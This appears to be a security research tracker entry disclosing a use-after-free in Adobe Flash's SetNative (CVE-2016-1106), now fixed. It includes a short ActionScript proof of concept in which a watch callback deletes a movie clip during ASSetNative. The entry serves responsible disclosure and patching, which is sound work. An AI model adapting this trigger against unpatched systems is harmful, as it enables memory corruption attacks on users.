Status: Fixed
Closed: May 2016
Adobe Flash: Use-after-free in SetNative
Project Member Reported by natashenka@google.com, Apr 12 2016
There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:

var t = this.createEmptyMovieClip("t", 1);
t.watch("a", func);           // watch callback fires when "a" is initialized by SetNative
ASSetNative(t, 106, "a,b");

function func() {
	t.removeMovieClip();      // deletes t while SetNative is still operating on it
}

A swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
setnative.swf
665 bytes Download
setnative.fla
4.6 KB Download
Project Member Comment 1 by natashenka@google.com, May 16 2016
Labels: -Restrict-View-Commit CVE-2016-1106
Status: Fixed